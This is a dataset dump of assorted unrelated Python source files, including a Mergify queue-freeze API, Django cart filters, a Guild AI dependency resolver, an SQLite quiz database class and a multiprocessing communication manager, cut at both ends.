freeze_date=qf.freeze_date,\n )\n ],\n )\n\n\n@router.delete(\n \"/repos/{owner}/{repository}/queue/{queue_name}/freeze\", # noqa: FS003\n summary=\"Unfreeze merge queue\",\n description=\"Unfreeze the specified merge queue\",\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def delete_queue_freeze(\n application: application_mod.Application = fastapi.Depends( # noqa: B008\n security.get_application\n ),\n queue_name: rules.QueueName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the queue\"\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> fastapi.Response:\n\n qf = freeze.QueueFreeze(\n repository=repository_ctxt,\n name=queue_name,\n application_name=application.name,\n application_id=application.id,\n )\n if not await qf.delete():\n raise fastapi.HTTPException(\n status_code=404,\n detail=f'The queue \"{queue_name}\" does not exists or is not currently frozen.',\n )\n\n return fastapi.Response(status_code=HTTP_204_NO_CONTENT)\n\n\n@router.get(\n \"/repos/{owner}/{repository}/queue/{queue_name}/freeze\", # noqa: FS003\n summary=\"Get queue freeze data\",\n description=\"Checks if the queue is frozen and get the queue freeze data\",\n response_model=QueueFreezeResponse,\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def get_queue_freeze(\n queue_name: rules.QueueName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the queue\"\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> QueueFreezeResponse:\n\n qf = await freeze.QueueFreeze.get(repository_ctxt, queue_name)\n if qf is None:\n raise fastapi.HTTPException(\n status_code=404,\n detail=f'The queue \"{queue_name}\" does not exists or is not currently frozen.',\n )\n\n return QueueFreezeResponse(\n queue_freezes=[\n QueueFreeze(\n name=qf.name,\n reason=qf.reason,\n application_name=qf.application_name,\n application_id=qf.application_id,\n freeze_date=qf.freeze_date,\n )\n ],\n )\n\n\n@router.get(\n \"/repos/{owner}/{repository}/queues/freezes\", # noqa: FS003\n summary=\"Get the list of frozen queues\",\n description=\"Get the list of frozen queues inside the requested repository\",\n response_model=QueueFreezeResponse,\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def get_list_queue_freeze(\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> QueueFreezeResponse:\n\n return QueueFreezeResponse(\n queue_freezes=[\n QueueFreeze(\n name=qf.name,\n reason=qf.reason,\n application_name=qf.application_name,\n application_id=qf.application_id,\n freeze_date=qf.freeze_date,\n )\n async for qf in freeze.QueueFreeze.get_all(repository_ctxt)\n ]\n )\n","sub_path":"mergify_engine/web/api/queues.py","file_name":"queues.py","file_ext":"py","file_size_in_byte":18321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"293062880","text":"\"\"\"Test Home Assistant yaml loader.\"\"\"\nimport io\nimport unittest\n\nfrom homeassistant.util import yaml\n\n\nclass TestYaml(unittest.TestCase):\n \"\"\"Test util.yaml loader.\"\"\"\n\n def test_simple_list(self):\n \"\"\"Test simple list.\"\"\"\n conf = \"config:\\n - simple\\n - list\"\n with io.StringIO(conf) as f:\n doc = yaml.yaml.safe_load(f)\n assert doc['config'] == [\"simple\", \"list\"]\n\n def test_simple_dict(self):\n \"\"\"Test simple dict.\"\"\"\n conf = \"key: value\"\n with io.StringIO(conf) as f:\n doc = yaml.yaml.safe_load(f)\n assert doc['key'] == 'value'\n\n def test_duplicate_key(self):\n \"\"\"Test simple dict.\"\"\"\n conf = \"key: thing1\\nkey: thing2\"\n try:\n with io.StringIO(conf) as f:\n yaml.yaml.safe_load(f)\n except Exception:\n pass\n else:\n assert 0\n","sub_path":"tests/util/test_yaml.py","file_name":"test_yaml.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"1975179","text":"from django import template\n#decorator filter used\nregister = template.Library()\n\n#product cart e ace ki na?\n@register.filter(name='is_in_cart')\ndef is_in_cart(product,cart):\n keys=cart.keys()\n for id in keys:\n if int(id) == product.id:\n return True \n \n return False\n\n#add to cart quantity\n@register.filter(name='cart_quantity')\ndef cart_quantity(product,cart):\n keys=cart.keys()\n for id in keys:\n if int(id) == product.id:\n return cart.get(id)\n \n return 0\n\n#cart product price\n@register.filter(name='total_price')\ndef total_price(product,cart):\n return product.price * cart_quantity(product,cart)\n\n#Total Cart Price Sum\n@register.filter(name='cart_total_price')\ndef cart_total_price(products,cart):\n sum = 0\n for p in products:\n sum += total_price(p,cart)\n return sum","sub_path":"store/templatetags/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"330762685","text":"import json\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), \".\", \"library\"))\nimport healthbot_event,fluentd_message,appformix_event\n \ndef identify(message):\n try:\n message = json.loads(message)\n print(message)\n if \"ident\" in message.keys() or \"value\" in message.keys():\n application_name = \"fluentd\"\n elif \"trigger\" in message.keys():\n application_name = \"healthbot\"\n elif \"kind\" in message.keys():\n application_name = \"appformix\"\n else:\n application_name = \"default\"\n print(\"application name:\" + application_name)\n if application_name == \"healthbot\":\n event = healthbot_event.HealthbotEvent(message)\n #if event_type == \"app1\":\n elif application_name == \"appformix\":\n event = appformix_event.AppformixEvent(message)\n elif application_name == \"fluentd\":\n #check if it is fluentd jitter \n if \"message\" in message.keys():\n if \"jitter\" in message[\"message\"]:\n event = fluentd_message.FluentdMessageJitter(message)\n else:\n event = fluentd_message.FluentdMessage(message)\n #check if it is fluentd snmp trap\n elif \"value\" in message.keys():\n if \"SNMP\" in message[\"value\"]:\n event = fluentd_message.FluentdMessageSNMPTrap(message)\n else:\n event = fluentd_message.FluentdMessage(message)\n else:\n event = message\n except Exception as e:\n print(\"invalid format\")\n print(e)\n event = message\n return event\n\n","sub_path":"identify_event.py","file_name":"identify_event.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315731288","text":"import sys\nimport logging\n\nfrom aiohttp import web\nfrom jsonrpcserver.aio import methods\nfrom jsonrpcserver.exceptions import InvalidParams\n\nimport service.common\nimport service.image_recon as img_recon\nfrom service import flowers_map_names, dogs_map_names\n\nlogging.basicConfig(level=10, format=\"%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s\")\nlog = logging.getLogger(\"img_recon_service\")\n\n\n@methods.add\nasync def version(**kwargs):\n log.debug(\"version()\")\n return {\"result\": \"v0.1\"}\n\n\n@methods.add\nasync def flowers(**kwargs):\n log.debug(\"flowers({})\".format(kwargs))\n model = kwargs.get(\"model\", \"ResNet18\")\n map_names = flowers_map_names\n img_path = kwargs.get(\"img_path\", None)\n if img_path is None:\n raise InvalidParams(\"\\\"img_path\\\" is required\")\n image_dims = (3, 224, 224)\n result = img_recon.image_recognition(\n \"flowers\", model, map_names, img_path, image_dims\n )\n return {\"result\": result}\n\n\n@methods.add\nasync def dogs(**kwargs):\n log.debug(\"dogs({})\".format(kwargs))\n model = kwargs.get(\"model\", \"ResNet18\")\n map_names = dogs_map_names\n img_path = kwargs.get(\"img_path\", None)\n if img_path is None:\n raise InvalidParams(\"\\\"img_path\\\" is required\")\n image_dims = (3, 224, 224)\n\n result = img_recon.image_recognition(\"dogs\", model, map_names, img_path, image_dims)\n return {\"result\": result}\n\n\n@methods.add\nasync def cars(**kwargs):\n log.debug(\"cars({})\".format(kwargs))\n return {\"result\": '\"cars\" Not Implemented yet!'}\n\n\nasync def json_rpc_handle(request):\n request = await request.text()\n response = await methods.dispatch(request, trim_log_values=True)\n if response.is_notification:\n return web.Response()\n else:\n return web.json_response(response, status=response.http_status)\n\n\nif __name__ == \"__main__\":\n parser = service.common.common_parser(__file__)\n args = parser.parse_args(sys.argv[1:])\n service.common.main_loop(json_rpc_handle, args)\n","sub_path":"Services/JSON-RPC/CNTK_ImageRecon/service/image_recon_service.py","file_name":"image_recon_service.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510886720","text":"# Copyright 2017 TensorHub, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport logging\nimport os\nimport re\n\nfrom guild import namespace\nfrom guild import resource\nfrom guild import util\nfrom guild.resolve import ResolutionError\n\nlog = logging.getLogger(\"core\")\n\nRESOURCE_TERM = r\"[a-zA-Z0-9_\\-\\.]+\"\n\nclass DependencyError(Exception):\n pass\n\nclass ResolutionContext(object):\n\n def __init__(self, target_dir, opdef):\n self.target_dir = target_dir\n self.opdef = opdef\n\nclass Resource(object):\n\n def __init__(self, resdef, ctx):\n self.resdef = resdef\n self.ctx = ctx\n\n def resolve(self):\n log.info(\"Resolving '%s' resource\", self.resdef.name)\n for source in self.resdef.sources:\n self._resolve_source(source)\n\n def _resolve_source(self, source):\n resolver = self.resdef.get_source_resolver(source)\n if not resolver:\n raise DependencyError(\n \"unsupported source '%s' in resource '%s'\"\n % (source, self.resdef.name))\n try:\n source_path = resolver.resolve()\n except ResolutionError as e:\n raise DependencyError(\n \"could not resolve '%s' in '%s' resource: %s\"\n % (source, self.resdef.name, e))\n else:\n self._verify_file(source_path, source.sha256)\n unpacked = self._maybe_unpack(source_path, source)\n to_link = [source_path] if unpacked is None else unpacked\n for path in to_link:\n self._link_to_source(path)\n\n def _verify_file(self, path, sha256):\n self._verify_file_exists(path)\n if sha256:\n self._verify_file_hash(path, sha256)\n\n def _verify_file_exists(self, path):\n if not os.path.exists(path):\n raise DependencyError(\n \"'%s' required by operation '%s' does not exist\"\n % (path, self.ctx.opdef.fullname))\n\n def _verify_file_hash(self, path, sha256):\n actual = util.file_sha256(path)\n if actual != sha256:\n raise DependencyError(\n \"'%s' required by operation '%s' has an unexpected sha256 \"\n \"(expected %s but got %s)\"\n % (path, self.ctx.opdef.fullname, sha256, actual))\n\n def _maybe_unpack(self, source_path, source):\n if not source.unpack:\n return None\n archive_type = self._archive_type(source_path, source)\n if not archive_type:\n return None\n return self._unpack(source_path, archive_type, source.prefix)\n\n @staticmethod\n def _archive_type(source_path, source):\n if source.type:\n return source.type\n parts = source_path.lower().split(\".\")\n if parts[-1] == \"zip\":\n return \"zip\"\n elif parts[-1] == \"tar\" or parts[-2:-1] == \"tar\":\n return \"tar\"\n else:\n return None\n\n def _unpack(self, source_path, type, prefix):\n if type == \"zip\":\n return self._unzip(source_path, prefix)\n elif type == \"tar\":\n return self._untar(source_path, prefix)\n else:\n raise DependencyError(\n \"'%s' required by operation '%s' cannot be unpacked \"\n \"(unsupported archive type '%s')\"\n % (source_path, self.ctx.opdef.fullname, type))\n\n def _unzip(self, source_path, prefix):\n import zipfile\n zf = zipfile.ZipFile(source_path)\n return self._gen_unpack(\n os.path.dirname(source_path), zf.namelist, zf.extractall, prefix)\n\n def _untar(self, source_path, prefix):\n import tarfile\n tf = tarfile.TarFile(source_path)\n return self._gen_unpack(\n os.path.dirname(source_path), tf.getnames, tf.extractall, prefix)\n\n def _gen_unpack(self, dest, list_files, extract_all, prefix):\n files = list_files()\n to_extract = [\n name for name in files\n if not os.path.exists(os.path.join(dest, name))\n ]\n extract_all(dest, to_extract)\n if prefix:\n return self._prefixed_source_paths(dest, files, prefix)\n else:\n return self._all_source_paths(dest, files)\n\n @staticmethod\n def _prefixed_source_paths(dest, files, prefix):\n prefixed = [\n name[len(prefix):] for name in files\n if name.startswith(prefix)\n ]\n root_names = [name.split(\"/\")[0] for name in prefixed]\n return [\n os.path.join(dest, prefix + name) for name in set(root_names)\n ]\n\n @staticmethod\n def _all_source_paths(dest, files):\n root_names = [name.split(\"/\")[0] for name in files]\n return [os.path.join(dest, name) for name in set(root_names)]\n\n def _link_to_source(self, source_path):\n link = self._link_path(source_path)\n if os.path.exists(link):\n log.warning(\"source '%s' already exists, skipping link\", link)\n return\n util.ensure_dir(os.path.dirname(link))\n log.debug(\"resolving source '%s' as link '%s'\", source_path, link)\n os.symlink(source_path, link)\n\n def _link_path(self, source_path):\n basename = os.path.basename(source_path)\n res_path = self.resdef.path or \"\"\n if os.path.isabs(res_path):\n raise DependencyError(\n \"invalid path '%s' in resource '%s' (path must be relative)\"\n % (res_path, self.resdef.name))\n return os.path.join(self.ctx.target_dir, res_path, basename)\n\ndef _dep_desc(dep):\n return \"%s:%s\" % (dep.opdef.modeldef.name, dep.opdef.name)\n\ndef resolve(dependencies, ctx):\n for dep in dependencies:\n resource = _dependency_resource(dep.spec, ctx)\n resource.resolve()\n\ndef _dependency_resource(spec, ctx):\n res = util.find_apply(\n [_model_resource,\n _modelfile_resource,\n _packaged_resource],\n spec, ctx)\n if res:\n return res\n raise DependencyError(\n \"invalid dependency '%s' in operation '%s'\"\n % (spec, ctx.opdef.fullname))\n\ndef _model_resource(spec, ctx):\n m = re.match(r\"(%s)$\" % RESOURCE_TERM, spec)\n if m is None:\n return None\n res_name = m.group(1)\n return _modeldef_resource(ctx.opdef.modeldef, res_name, ctx)\n\ndef _modeldef_resource(modeldef, res_name, ctx):\n resdef = modeldef.get_resource(res_name)\n if resdef is None:\n raise DependencyError(\n \"resource '%s' required by operation '%s' is not defined\"\n % (res_name, ctx.opdef.fullname))\n return Resource(resdef, ctx)\n\ndef _modelfile_resource(spec, ctx):\n m = re.match(r\"(%s):(%s)$\" % (RESOURCE_TERM, RESOURCE_TERM), spec)\n if m is None:\n return None\n model_name = m.group(1)\n modeldef = ctx.opdef.modelfile.get(model_name)\n if modeldef is None:\n raise DependencyError(\n \"model in resource '%s' required by operation \"\n \"'%s' is not defined\"\n % (spec, ctx.opdef.fullname))\n res_name = m.group(2)\n return _modeldef_resource(modeldef, res_name, ctx)\n\ndef _packaged_resource(spec, ctx):\n m = re.match(r\"(%s)/(%s)$\" % (RESOURCE_TERM, RESOURCE_TERM), spec)\n if m is None:\n return None\n pkg_name = m.group(1)\n res_name = m.group(2)\n try:\n resources = list(resource.for_name(res_name))\n except LookupError:\n pass\n else:\n for res in resources:\n if namespace.apply_namespace(res.dist.project_name) == pkg_name:\n return Resource(res.resdef, ctx)\n raise DependencyError(\n \"resource '%s' required by operation '%s' is not installed\"\n % (spec, ctx.opdef.fullname))\n","sub_path":"guild/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":8248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"581828644","text":"FIRST_TEN = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\",\n \"eight\", \"nine\"]\nSECOND_TEN = [\"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\"]\nOTHER_TENS = [\"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\",\n \"eighty\", \"ninety\"]\nHUNDRED = \"hundred\"\n\n\ndef checkio(number):\n\n def digit(number):\n return FIRST_TEN[int(number)]\n\n def double_digit(number):\n fd, sd = number\n if fd == '1':\n return SECOND_TEN[int(sd)]\n\n tens = OTHER_TENS[int(fd) - 2]\n\n if sd == '0':\n return tens\n\n return '%s %s' % (tens, digit(sd))\n\n def tree_digit(number):\n h, fd, sd = number\n\n hundreds = '%s %s' % (digit(h), HUNDRED)\n\n if fd == '0' and sd == '0':\n return hundreds\n\n if fd == '0':\n return '%s %s' % (hundreds, digit(sd))\n\n return '%s %s' % (hundreds, double_digit(number[1:]))\n\n cnum = '%d' % number\n s = len(cnum)\n ret = ''\n\n if s == 1:\n ret = digit(cnum)\n elif s == 2:\n ret = double_digit(cnum)\n elif s == 3:\n ret = tree_digit(cnum)\n return ret\n\n#Some hints\n#Don't forget strip whitespaces at the end of string\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(4) == 'four', \"1st example\"\n assert checkio(133) == 'one hundred thirty three', \"2nd example\"\n assert checkio(12) == 'twelve', \"3rd example\"\n assert checkio(101) == 'one hundred one', \"4th example\"\n assert checkio(212) == 'two hundred twelve', \"5th example\"\n assert checkio(40) == 'forty', \"6th example\"\n assert checkio(88) == 'eighty eight', \"7th example\"\n assert checkio(20) == 'twenty', \"8th example\"\n assert checkio(100) == 'one hundred', \"9th example\"\n assert checkio(940) == 'nine hundred forty', \"10th example\"\n\n","sub_path":"speechmodule.py","file_name":"speechmodule.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"473448824","text":"import sqlite3 as sq\r\nfrom os.path import isfile\r\nfrom collections.abc import Iterable\r\n\r\n__author__ = \"Nadav Shani Date: 03/06/2020 (for last version)\"\r\n\r\n\r\nclass DBClass:\r\n db_name = \"top5.db\"\r\n table_name_qst_levels_12 = \"questionsAndAnswersLevel12\"\r\n table_name_qst_level3 = \"questionsAndAnswersLevel3\"\r\n table_name_players = \"top5\"\r\n \r\n def __init__(self):\r\n \"\"\"\r\n check if the db exist,\r\n creates connection to db\r\n and makes a cursor\r\n \"\"\"\r\n assert isfile(DBClass.db_name), \"Database doesn't exists!\"\r\n\r\n self.conn = self.create_connection()\r\n self.cursor = self.conn.cursor()\r\n\r\n @staticmethod\r\n def create_connection():\r\n \"\"\" create a database connection to the SQLite database\r\n :return: Connection object or None\r\n \"\"\"\r\n try:\r\n conn = sq.connect(DBClass.db_name)\r\n except sq.Error as e:\r\n raise e\r\n \r\n return conn\r\n\r\n def insert_qst_ans(self, question, answer, level, multi=False):\r\n \"\"\"\r\n inserts the database a question and answer\r\n :param question: an English question\r\n :param answer: question's English answer\r\n :param multi: multiple questions and answers\r\n :param level: question level (1 - 3)\r\n :type question: Iterable\r\n :type answer: Iterable\r\n :type multi: bool\r\n \"\"\"\r\n assert type(answer) == list or isinstance(answer, Iterable),\\\r\n \"Answer must be string or Iterable object.\"\r\n\r\n assert type(question) == list or isinstance(question, Iterable), \\\r\n \"Question must be string or Iterable object.\"\r\n\r\n assert 1 <= level <= 3, \"Unknown level\"\r\n\r\n if level == 3:\r\n table_name = DBClass.table_name_qst_level3\r\n else:\r\n table_name = DBClass.table_name_qst_levels_12\r\n\r\n command = \"INSERT INTO %s \" % table_name\r\n\r\n if not multi:\r\n command += \"(question, answer) VALUES ('%s', '%s');\" % (question,\r\n answer)\r\n else:\r\n command += \"(question, answer) VALUES\"\r\n for qst, ans in zip(question, answer):\r\n command += f\"\\n('{qst}', '{ans}'),\"\r\n command = command[:-1] + \";\"\r\n\r\n print(command)\r\n try:\r\n print(command)\r\n self.cursor.execute(command)\r\n except sq.Error as e:\r\n raise e\r\n self.conn.commit()\r\n\r\n def get_ans_qst_lst(self, level):\r\n \"\"\"\r\n :param level: question level (1 - 3)\r\n :return: list for questions and answers\r\n \"\"\"\r\n assert 1 <= level <= 3, \"Unknown level\"\r\n\r\n if level == 3:\r\n table_name = DBClass.table_name_qst_level3\r\n else:\r\n table_name = DBClass.table_name_qst_levels_12\r\n\r\n command = \"SELECT * FROM %s;\" % table_name\r\n return list(self.cursor.execute(command))\r\n\r\n def insert_player(self, name, score):\r\n \"\"\"\r\n inserts player name and score to top5 db\r\n :param name: player's name (str)\r\n :param score: player's score (int)\r\n :return: None\r\n \"\"\"\r\n command = \"UPDATE %s \" % self.table_name_players\r\n command += \"SET name_player = '%s', score = %d \" % (name, score)\r\n command += \"WHERE name_player = ( \"\r\n command += \"SELECT name_player \"\r\n command += \"FROM %s \" % self.table_name_players\r\n command += \"WHERE score < %d \" % score\r\n command += \"ORDER BY score ASC \"\r\n command += \"LIMIT 1 );\"\r\n\r\n self.cursor.execute(command)\r\n self.conn.commit()\r\n\r\n def get_top5(self):\r\n \"\"\"\r\n :return: list of the top5 players with their score\r\n \"\"\"\r\n command = \"SELECT * FROM top5 ORDER BY score DESC;\"\r\n return list(self.cursor.execute(command))[:5]\r\n\r\n def close_db(self):\r\n \"\"\"\r\n closes database\r\n \"\"\"\r\n try:\r\n self.conn.close()\r\n except Exception as e:\r\n print(e)\r\n","sub_path":"db_python_file.py","file_name":"db_python_file.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"343400921","text":"\"\"\"\nRegistry for www subdomain\n\nContains allowed directories and file mappings\n\"\"\"\nfrom server.util import *\n\nallowed_directories = ['html', 'css', 'images']\n\nmappings = {'commands': 'html/commands.html',\n 'about': 'html/about.html',\n 'status': 'html/status.html',\n 'contact': 'html/contact.html',\n 'index': 'html/index.html',\n 'favicon.ico': 'images/icon.png',\n '': 'html/index.html'}\n\n\ndef allowed(dir):\n return dir in allowed_directories\n\n\ndef map(trans_path: TranslatedPath):\n if trans_path.path in mappings:\n trans_path.update(mappings[trans_path.path])\n","sub_path":"subdomains/www/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"9745795","text":"from pymongo import MongoClient\nfrom pprint import pprint\nimport data_cleaning as dc\nimport json\nimport math\nimport asyncio\nimport Authentication as A\n\nasync def learning():\n client = MongoClient(\"mongodb://localhost:27017/\")\n mydb = client[\"ART_solutions\"]\n mycol = mydb[\"solutions\"]\n x=list(mycol.find())\n for obj in x:\n pprint(\"---->\"+obj[\"solutionID\"])\n obj[\"solutionID\"]=int(obj[\"solutionID\"])\n data_obj=x\n await asyncio.sleep(0.001)\n return dc.reorder_data(data_obj)\n\nasync def Authentication():\n await asyncio.sleep(0.001)\n return A.salesforcetokenAPI()\n\nasync def main():\n learn = loop.create_task(learning())\n Auth = loop.create_task(Authentication())\n await asyncio.wait([learn,Auth])\n return learn,Auth\n\n \nif __name__ == '__main__':\n try:\n loop=asyncio.get_event_loop()\n r1,r2 = loop.run_until_complete(main())\n pprint(r1)\n pprint(r2)\n except Exception as e:\n pass\n finally:\n loop.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"299999309","text":"\nimport sys\nimport multiprocessing\nfrom multiprocessing import Process, Manager\n\nimport IoOps\n\n# basic parallel operations:\n# who-ami-i, how-big-is-the-world\n# block/non-blocking send and recv\n# broadcast, gather/scatter\n\n# we'll use negative tags for \"internal\" communication\n# : other than:\nANY_TAG = -1\nANY_PE = -1\n\nclass CommMgr():\n def __init__( self, **kwargs ):\n self.tid = kwargs.get( 'tid', -1 )\n self.ns = kwargs.get( 'namespace', None )\n self.num_pes = self.ns.num_pes\n\n # non-blocking send\n # : internal, allows negative tags\n def int_send( self, other_pe, tag, data ):\n comm = self.ns.msgLists[other_pe]\n comm.append( (self.tid,tag,data) )\n # TODO: check for errors\n return (0,0)\n\n # : external/blocking send, disallows negative tags other than -1==ANY_TAG\n def send( self, other_pe, tag, data ):\n if( tag < -1 ):\n return (-1,'ERROR_BAD_TAG')\n # send the data\n rtn = self.int_send( other_pe, tag, data )\n # wait for it to be grabbed/removed\n comm = self.ns.msgLists[other_pe]\n #msg = (other_pe,tag,data)\n all_done = False\n while not all_done:\n #if( not msg in comm ):\n # break\n all_done = True\n for msg in comm:\n if( (msg[0]==ns.tid) and (msg[1]==tag) \\\n and (msg[2]==data) ):\n all_done = False\n # TODO: add a throttle to this spin-loop\n return rtn\n\n # : external/non-blocking send, disallows negative tags other than -1==ANY_TAG\n def isend( self, other_pe, tag, data ):\n if( tag < -1 ):\n return (-1,'ERROR_BAD_TAG')\n return self.int_send( other_pe, tag, data )\n\n # blocking and non-blocking recv\n # : internal, allows negative tags\n def int_recv( self, blocking, rem_pe, tag ):\n recv_pe = -1\n recv_tag = -1\n recv_data = None\n\n comm = self.ns.msgLists[self.tid]\n # if blocking==false, then set all_done=True,\n # then we'll only do a single trip thru loop\n all_done = not blocking\n while not all_done:\n #for msg in comm:\n for n in range(len(comm)):\n msg = comm[n]\n # match on remote-pe?\n match_pe = False\n if( rem_pe == -1 ):\n match_pe = True\n elif( msg[0] == rem_pe ):\n match_pe = True\n\n # match on tag?\n match_tag = False\n if( tag == -1 ):\n match_tag = True\n elif( msg[1] == tag ):\n match_tag = True\n\n if( match_pe and match_tag ): \n (recv_pe,recv_tag,recv_data) = msg\n #print( 'msg='+str(msg) )\n # pull this msg out of the list\n #comm.remove( msg )\n comm.pop( n )\n all_done = True\n break\n \n # TODO: add a throttle to this spin-loop\n\n # TODO: check for errors\n return (recv_pe,recv_tag,recv_data)\n\n # : external/blocking recv, disallows negative tags other than -1==ANY_TAG\n def recv( self, rem_pe, tag ):\n if( tag < -1 ):\n return (-1,-1,'ERROR_BAD_TAG')\n return self.int_recv(True,rem_pe,tag)\n\n # : external/non-blocking recv, disallows negative tags other than -1==ANY_TAG\n def irecv( self, rem_pe, tag ):\n if( tag < -1 ):\n return (-1,-1,-1)\n return self.int_recv(False,rem_pe,tag)\n\n def barrier( self ):\n # post the sends\n for i in range(self.num_pes):\n if( i != self.tid ):\n self.int_send( i, -11, self.tid )\n # wait for recvs (this is a terrible way to do it)\n # TODO: wait for any matching message as they come in\n for i in range(self.num_pes):\n if( i != self.tid ):\n self.int_recv( True, i, -11 )\n return\n\n def collect( self, value ):\n rtn = [ 0 for i in range(self.num_pes) ]\n for i in range(self.num_pes):\n if( i != self.tid ):\n self.int_send( i, -22, value )\n for i in range(self.num_pes):\n if( i == self.tid ):\n rtn[i] = value\n else:\n msg = self.int_recv( True, i, -22 )\n rtn[i] = msg[2]\n return rtn\n\n #\n # For load/save to disk .. we ASSUME that all TIDs have same amount of data!\n def loadPopulation( self, gaMgr, filename ):\n start = self.tid * gaMgr.population_sz\n finish = start + gaMgr.population_sz\n pop = IoOps.loadPopulation( gaMgr, filename, start, finish)\n return pop\n\n # sort of 'for completeness' ...\n def randomPopulation( self, gaMgr, num ):\n return IoOps.randomPopulation( gaMgr, num )\n\n # dumb/brute-force approach ... all IO is done by TID=0\n # : this could have major memory and performance implications!\n def savePopulation( self, gaMgr, filename, mode='w' ):\n if( self.tid == 0 ):\n with open(filename,mode) as fp:\n # write TID-0 data first:\n for p in gaMgr.population:\n txt = p.packData()\n fp.write( txt + '\\n' )\n # now for each other TID in sequence ...\n for i in range(1,self.num_pes):\n x,y,data = self.int_recv( True, i, -123 )\n for p in data:\n txt = p.packData()\n fp.write( txt + '\\n' )\n else:\n # every other TID sends to TID=0\n self.int_send( 0, -123, gaMgr.population )\n\n\n\n# # # # # # # # # # # # # # # # # # # #\n\nclass ParallelMgr():\n def __init__( self, **kwargs ):\n num_pes = kwargs.get( 'num_pes', 1 )\n\n # TODO: compare num_pes to multiprocessing.cpu_count()\n\n # manager for manager-to-worker communication & shared namespace\n self.mpMgr = Manager()\n self.namespace = self.mpMgr.Namespace()\n # need a copy of num_pes\n self.namespace.num_pes = num_pes\n\n # manager for manager-to-worker communication\n self.namespace.masterList = [ self.mpMgr.list() for i in range(num_pes) ]\n # self.masterList = [ self.commMgr.list() for i in range(self.num_pes) ]\n\n # separate lists for direct PE-to-PE communication\n self.namespace.msgLists = [ self.mpMgr.list() for i in range(num_pes) ]\n # self.msgLists = [ self.commMgr.list() for i in range(self.num_pes) ]\n\n print( 'ParallelMgr init' )\n sys.stdout.flush()\n\n def runWorkers( self, workerModule ):\n # self.peList = [ workerModule(i,self.namespace) for i in range(self.namespace.num_pes) ]\n self.peList = []\n for i in range(self.namespace.num_pes):\n commMgr = CommMgr( tid=i, namespace=self.namespace )\n pid = workerModule( i, commMgr )\n self.peList.append( pid )\n for pe in self.peList:\n print( 'starting worker '+str(pe) )\n pe.start()\n # TODO: check for errors\n\n def finalize( self ):\n print( 'waiting for workers to finish' )\n for pe in self.peList:\n print( 'worker '+str(pe)+' is_alive='+str(pe.is_alive()) )\n \n for pe in self.peList:\n pe.join()\n # TODO: check for errors\n\n","sub_path":"PyGenAlg/ParallelMgr.py","file_name":"ParallelMgr.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191370183","text":"class Solution(object):\n def addBoldTag(self, s, dict):\n \"\"\"\n :type s: str\n :type dict: List[str]\n :rtype: str\n \"\"\"\n def find_all(s, sub):\n i = s.find(sub)\n while i != -1:\n yield i\n i = s.find(sub, i+1)\n intervals = []\n for word in dict:\n length = len(word)\n intervals.extend([[x, x + length] for x in find_all(s, word)])\n intervals.sort()\n merge = []\n for interval in intervals:\n if merge and merge[-1][1] >= interval[0]:\n merge[-1][1] = max(merge[-1][1], interval[1])\n else:\n merge.append(interval)\n if not merge: return s\n end = 0\n res = []\n for interval in merge:\n res.append(s[end:interval[0]])\n end = interval[1]\n res.append('' + s[interval[0]:interval[1]] + '')\n res.append(s[end:])\n return ''.join(res)","sub_path":"leetcode/python/ex_616.py","file_name":"ex_616.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"312176962","text":"from tradgame import 